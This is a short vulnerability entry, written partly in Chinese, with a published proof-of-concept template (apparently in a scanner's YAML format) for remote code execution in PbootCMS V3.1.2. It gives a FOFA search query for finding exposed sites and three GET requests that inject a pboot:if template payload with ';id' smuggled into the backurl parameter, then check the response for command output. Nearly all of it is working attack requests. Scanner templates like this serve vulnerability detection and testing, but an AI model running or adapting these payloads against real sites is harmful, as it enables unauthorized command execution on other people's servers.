漏洞描述
pbootcms-V3.1.2
FOFA: app="pbootcms"
pbootcms-v3.1.2-rce: Pbootcms V3.1.2 RCE
PoC代码[已公开]
id: pbootcms-v3.1.2-rce
info:
name: Pbootcms V3.1.2 RCE
author: Air
severity: critical
verified: false
description: |
pbootcms-V3.1.2
FOFA: app="pbootcms"
reference:
- https://susec.me/2021/11/22/pboot-cms-V3-1-2-%E8%99%9A%E5%81%87%E7%9A%84%E6%97%A0%E6%96%87%E4%BB%B6%E8%90%BD%E5%9C%B0RCE/#x-%E6%9C%89%E5%85%B3%E8%A5%BF%E6%B9%96%E8%AE%BA%E5%89%
rules:
r0:
request:
method: GET
path: /index.php/?suanve=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if}&backurl=;id
headers:
Cookie: "XDEBUG_SESSIO1N=17340;lg=system;PbootSystem=8g1gcjum9vbcbqeh6epc5hlloa"
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
r1:
request:
method: GET
path: /index.php/keyword?keyword=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if}&backurl=;id
headers:
Cookie: "XDEBUG_SESSIO1N=17340;lg=system;PbootSystem=8g1gcjum9vbcbqeh6epc5hlloa"
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
r2:
request:
method: GET
path: /?member/login/?suanve=}{pboot:if((get_lg/*suanve-*/())/**/(get_backurl/*suanve-*/()))}123321suanve{/pboot:if}&backurl=;id
headers:
Cookie: "XDEBUG_SESSIO1N=17340;lg=system;PbootSystem=8g1gcjum9vbcbqeh6epc5hlloa"
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() || r1() || r2()